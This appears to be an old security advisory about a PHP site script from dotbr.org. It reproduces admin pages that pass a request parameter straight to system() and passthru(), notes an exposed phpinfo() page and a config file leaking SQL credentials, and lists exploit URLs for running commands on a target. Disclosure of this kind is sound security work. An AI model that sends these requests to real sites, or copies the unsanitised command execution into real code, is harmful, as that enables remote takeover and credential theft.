More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2F
tutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguag
e_tools
Informations :
°°°°°°°°°°°°°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Informations disclosure
- System commands execution
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
foo.php3 :
---------------------
<? phpinfo(); ?>
---------------------
config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name
admin/exec.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
if (!isset($sep)) {
$sep = "_";
}
$cmd=str_replace($sep," ",$cmd);
passthru($cmd,$ret);
echo $ret;
?>
</pre>
</body>
</html>
---------------------------------------
admin/system.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
$cmd = str_replace("_"," ",$cmd);
system($cmd,$result);
echo "\n result == ". $result . "\n";
?>
</pre>
</body>
</html>
---------------------------------------
Exploits :
°°°°°°°°°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2F
tutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguag
e_tools
frog-m@n
http://www.phpsecure.org
_________________________________________________________________
[ reply ]